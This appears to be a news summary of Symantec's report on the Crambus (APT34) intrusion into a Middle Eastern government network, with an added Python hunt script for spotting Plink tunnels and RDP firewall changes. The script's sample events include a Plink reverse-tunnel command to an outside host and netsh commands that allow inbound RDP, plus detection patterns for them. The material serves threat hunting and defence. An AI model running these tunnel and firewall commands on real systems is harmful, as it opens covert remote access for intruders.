October 20, 2023 at 09:24AM
Broadcom’s Symantec cybersecurity unit has reported that the Iran-linked hacking group Crambus spent eight months inside the network of a Middle Eastern government. Crambus, also known as APT34 and OilRig, conducts espionage operations on behalf of the Iranian government. The attackers deployed several malware families, including a PowerShell backdoor called PowerExchange, and used Plink port forwarding together with firewall rule changes to reach compromised hosts over the Remote Desktop Protocol (RDP). At least 12 computers were confirmed affected, with evidence of backdoors and keyloggers on dozens more.
The report attributes the compromise of the government network to the group Symantec tracks as Crambus, which other vendors call APT34, OilRig, Cobalt Gypsy and Helix Kitten. MuddyWater (tracked elsewhere as Seedworm, Mango Sandstorm, Mercury and Static Kitten) is a distinct Iranian espionage group, which US Cyber Command publicly linked to Iranian intelligence in 2022; both groups conduct espionage in support of the Iranian government’s objectives.
Crambus remained undetected in the compromised network between February and September 2023, stealing data and credentials and deploying malware on multiple systems. The intrusion began with the execution of a PowerShell script on a single system on February 1; later in February, malicious activity appeared on a second compromised system and on a web server. In April, the attackers began executing commands on a domain controller.
Most of the malicious activity stayed on these systems until August, when additional systems, including a second web server, were compromised through the end of August and into September. Symantec states that at least 12 computers were confirmed affected, with evidence suggesting that backdoors and keyloggers were deployed on dozens more.
The attackers installed a PowerShell backdoor named PowerExchange, which logs in to a Microsoft Exchange Server with hardcoded credentials and uses email as its command channel: it monitors for messages sent by the attackers, executes the PowerShell commands they carry, writes files to disk, and exfiltrates files.
The attackers also used Plink, the publicly available command-line connection tool from the PuTTY suite, to configure port-forwarding rules on compromised machines so they could reach them over the Remote Desktop Protocol (RDP), and they modified Windows firewall rules to keep that remote access open.
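The two techniques in this paragraph leave distinctive process-creation records: a Plink command line carrying a reverse (-R) or local (-L) forward that touches TCP/3389, and a firewall command that lets RDP in. The hunt below is an added example written for this page, not code from Symantec’s report, and it assumes the rules were changed with netsh or Enable-NetFirewallRule (the report says only that firewall rules were modified). The event records are constructed samples with the fields of a Security 4688 or Sysmon event ID 1 record, not artefacts from the intrusion; the detections generalise beyond the page to SOCKS (-D) tunnels and to the PowerShell firewall cmdlet.

```python
"""Hunt process-creation records for Plink port forwarding and RDP firewall changes.

Each event is a dict with the fields of a Windows Security 4688 / Sysmon 1 record
that matter here: host, user, image, cmdline. Real deployments would read these
from the event log or a SIEM export. SAMPLE_EVENTS is constructed for illustration
and does not come from the Crambus intrusion."""
import re

RDP_PORT = 3389
# argv[0] that is plink or plink.exe, with or without a directory prefix
PLINK_RE = re.compile(r"(^|[\\/])plink(\.exe)?$", re.IGNORECASE)
# netsh advfirewall firewall add|set rule ...  (assumed form of the firewall change)
NETSH_RULE_RE = re.compile(r"netsh(?:\.exe)?\s+advfirewall\s+firewall\s+(add|set)\s+rule", re.IGNORECASE)
# PowerShell equivalent of enabling the built-in Remote Desktop rule group (also assumed)
PS_RDP_RULE_RE = re.compile(r"enable-netfirewallrule.*remote\s*desktop", re.IGNORECASE | re.DOTALL)
# Windows-style argument split: whitespace separates, double quotes group, backslashes are literal
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')

SAMPLE_EVENTS = [  # constructed sample records
    {"host": "WEB01", "user": "svc_backup", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"host": "WEB01", "user": "svc_backup", "image": r"C:\Users\Public\plink.exe",
     "cmdline": r"C:\Users\Public\plink.exe -N -R 0.0.0.0:4433:127.0.0.1:3389 -l tunnel -pw x 203.0.113.45 -P 443"},
    {"host": "DC01", "user": "adm_jdoe", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389'},
    {"host": "DC01", "user": "adm_jdoe", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"host": "FS02", "user": "backup", "image": r"C:\Tools\plink.exe",
     "cmdline": r"C:\Tools\plink.exe -batch admin@10.0.5.20 uptime"},   # plain SSH session, no tunnel
    {"host": "JUMP01", "user": "adm_jdoe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -c \"Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'\""},
]


def tokens_of(cmdline):
    """Split a Windows command line into arguments and drop the grouping quotes."""
    return [t.replace('"', "") for t in TOKEN_RE.findall(cmdline)]


def parse_forward(spec):
    """Parse a plink/ssh forward spec '[listen_addr:]listen_port:dest_host:dest_port' (IPv4 or hostnames)."""
    parts = spec.split(":")
    if len(parts) == 3:
        parts = ["127.0.0.1"] + parts          # plink defaults the listener to loopback
    if len(parts) != 4 or not (parts[1].isdigit() and parts[3].isdigit()):
        return None
    return {"listen_addr": parts[0], "listen_port": int(parts[1]),
            "dest_host": parts[2], "dest_port": int(parts[3])}


def plink_findings(tokens):
    """Flag Plink invocations that set up a tunnel: any reverse forward, a SOCKS proxy, or a local forward to RDP."""
    if not tokens or not PLINK_RE.search(tokens[0]):
        return []
    out = []
    for flag, arg in zip(tokens, tokens[1:]):
        if flag == "-D":
            out.append(f"plink SOCKS proxy on {arg}")
        elif flag in ("-R", "-L"):
            fwd = parse_forward(arg)
            if fwd is None:
                continue
            if flag == "-R":
                # Reverse forward: the attacker-controlled SSH server gets a listener that reaches back into the victim.
                out.append(f"plink reverse tunnel: remote :{fwd['listen_port']} -> {fwd['dest_host']}:{fwd['dest_port']}")
            elif fwd["dest_port"] == RDP_PORT:
                out.append(f"plink local tunnel to RDP: :{fwd['listen_port']} -> {fwd['dest_host']}:{fwd['dest_port']}")
    return out


def firewall_findings(cmdline, tokens):
    """Flag netsh or PowerShell commands that allow inbound TCP/3389 or enable the Remote Desktop rule group."""
    out = []
    m = NETSH_RULE_RE.search(cmdline)
    if m:
        kv = {}
        for tok in tokens:                      # key=value arguments, e.g. dir=in, localport=3389
            key, sep, val = tok.partition("=")
            if sep:
                kv[key.lower()] = val.lower()
        verb = m.group(1).lower()
        allows_in = kv.get("action") == "allow" and kv.get("dir") == "in"
        ports = kv.get("localport", "").split(",")  # comma lists only; port ranges are not expanded
        if verb == "add" and allows_in and str(RDP_PORT) in ports:
            out.append(f"netsh added inbound allow rule for TCP/{RDP_PORT}: {kv.get('name', '?')}")
        if verb == "set" and "remote desktop" in kv.get("group", "") and kv.get("enable") == "yes":
            out.append("netsh enabled the built-in Remote Desktop firewall rule group")
    if PS_RDP_RULE_RE.search(cmdline):
        out.append("Enable-NetFirewallRule turned on the Remote Desktop rule group")
    return out


def hunt(events):
    """Return (host, user, finding) for every event matching either technique, in event order."""
    results = []
    for ev in events:
        tokens = tokens_of(ev["cmdline"])
        for finding in plink_findings(tokens) + firewall_findings(ev["cmdline"], tokens):
            results.append((ev["host"], ev["user"], finding))
    return results


if __name__ == "__main__":
    for host, user, finding in hunt(SAMPLE_EVENTS):
        print(f"{host:7} {user:12} {finding}")
```

Pair the hits with logon telemetry: a reverse tunnel from a web server followed by RDP logons (event 4624, logon type 10) on the domain controller from loopback or an unexpected source is the pattern this paragraph describes, and a firewall change by an account that never administers the firewall is worth a call regardless of what else fires.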
In addition to PowerExchange, Crambus deployed three new malware families: the Tokel backdoor (PowerShell command execution and file download), the Dirps trojan (PowerShell command execution and file enumeration), and the Clipog infostealer (clipboard theft, keylogging, and logging of the process each keystroke was typed into).
Related coverage: Microsoft reported Iranian government hackers conducting wiper attacks against Azure environments; Iranian hackers exploited a recent PaperCut vulnerability; and Iranian cyberspies targeted a US-based think tank with new macOS malware.